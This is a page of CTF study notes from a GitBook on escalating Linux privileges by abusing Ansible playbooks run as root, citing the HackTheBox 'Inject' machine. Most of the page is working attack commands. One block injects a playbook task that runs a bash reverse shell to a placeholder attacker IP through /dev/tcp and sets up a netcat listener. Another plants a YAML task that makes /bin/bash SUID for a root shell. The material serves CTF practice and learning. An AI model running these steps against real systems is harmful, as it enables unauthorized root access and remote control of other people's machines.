> For the complete documentation index, see [llms.txt](https://iptracej.gitbook.io/windows-linux-and-active-directory-ctf-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://iptracej.gitbook.io/windows-linux-and-active-directory-ctf-notes/linux-priv/ansible.md).

# Ansible

Ansible Playbooks are lists of tasks that automatically execute against hosts.

<https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/ansible-playbook-privilege-escalation/>

### [PrivEsc with Tasks](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/ansible-playbook-privilege-escalation/#privesc-with-tasks) <a href="#privesc-with-tasks" id="privesc-with-tasks"></a>

{% code overflow="wrap" %}

```bash
# Create a yml file under /opt/ansible/playbooks. You see a geerlingguy.apache role defined. 

- name: Install and configure Apache
  ...
  roles:
    - role: geerlingguy.apache
  tasks:
    - name: configure firewall
      firewalld:
        ...

# Go to the dirctory /opt/ansible/roles/geerlingguy.apache/tasks, and add a new exploitable file in the directory.

- hosts: localhost
  tasks:
    - name: RShell
      command: sudo bash /tmp/root.sh
      
# Then creat a reverse shell in root.sh
echo '/bin/bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1' > /tmp/root.sh

# 
nc -lvnp <local-port>

# Execute
sudo ansible
sudo -u <user> ansible
# or wait for a root runs the ansible background.
```

{% endcode %}

### Automation Task

<https://www.hackthebox.com/machines/inject>

If the target system runs automation tasks with Ansible Playbook as root and we have a write permission of task files (**`tasks/`**), we can inject arbitrary commands in **yaml** file.

<figure><img src="https://4082237222-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FnA4bAkddGXesk1QCLYAY%2Fuploads%2FbiTRESGRfhEHzNo3pkUk%2Fimage.png?alt=media&amp;token=7709afd9-6576-4dc6-bf81-68ca7ae2203d" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```bash
# Create or overwrite a YAML malicious file.
echo "[{hosts: localhost, become: true, tasks: [shell: chmod +s /bin/bash]}]" > /opt/automation/tasks/pe.yml

# wait for pe.yml to be executed
# Run and then you are root. 
/bin/bash -p 
```

{% endcode %}

###
